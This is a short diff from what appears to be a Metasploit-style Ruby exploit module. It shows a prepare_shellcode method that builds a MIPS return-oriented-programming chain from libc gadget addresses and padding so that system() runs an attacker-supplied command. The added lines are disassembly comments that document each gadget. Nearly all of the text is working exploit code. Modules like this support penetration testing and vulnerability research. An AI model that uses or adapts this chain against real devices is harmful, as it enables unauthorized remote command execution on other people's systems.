@@ -89,14 +89,43 @@ def exploit
8989 def prepare_shellcode ( cmd )
9090 shellcode = rand_text_alpha_upper ( target [ 'Offset' ] ) # padding
9191 shellcode << [ target [ 'LibcBase' ] + target [ 'RestoreReg' ] ] . pack ( "N" ) # restore registers with controlled values
92+
93+ # 0003FE20 lw $ra, 0x48+var_4($sp)
94+ # 0003FE24 lw $s7, 0x48+var_8($sp)
95+ # 0003FE28 lw $s6, 0x48+var_C($sp)
96+ # 0003FE2C lw $s5, 0x48+var_10($sp)
97+ # 0003FE30 lw $s4, 0x48+var_14($sp)
98+ # 0003FE34 lw $s3, 0x48+var_18($sp)
99+ # 0003FE38 lw $s2, 0x48+var_1C($sp)
100+ # 0003FE3C lw $s1, 0x48+var_20($sp)
101+ # 0003FE40 lw $s0, 0x48+var_24($sp)
102+ # 0003FE44 jr $ra
103+ # 0003FE48 addiu $sp, 0x48
104+
92105 shellcode << rand_text_alpha_upper ( 36 ) # padding
93106 shellcode << [ target [ 'LibcBase' ] + target [ 'System' ] ] . pack ( "N" ) # s0 - system address-1
94107 shellcode << rand_text_alpha_upper ( 16 ) # unused registers $s1 - $s4
95108 shellcode << [ target [ 'LibcBase' ] + target [ 'CallSystem' ] ] . pack ( "N" ) # $s5 - call system
109+
110+ # 00041C10 move $t9, $s0
111+ # 00041C14 jalr $t9
112+ # 00041C18 nop
113+
96114 shellcode << rand_text_alpha_upper ( 8 ) # unused registers $s6 - $s7
97115 shellcode << [ target [ 'LibcBase' ] + target [ 'PrepareSystem' ] ] . pack ( "N" ) # write sp to $a0 -> parameter for call to system
116+
117+ # 000215B8 addiu $a0, $sp, 0x20
118+ # 000215BC lw $ra, 0x1C($sp)
119+ # 000215C0 jr $ra
120+ # 000215C4 addiu $sp, 0x20
121+
98122 shellcode << rand_text_alpha_upper ( 28 ) # padding
99123 shellcode << [ target [ 'LibcBase' ] + target [ 'CalcSystem' ] ] . pack ( "N" ) # add 1 to s0 (calculate system address)
124+
125+ # 000111EC move $t9, $s5
126+ # 000111F0 jalr $t9
127+ # 000111F4 addiu $s0, 1
128+
100129 shellcode << cmd
101130 end
102131
0 commit comments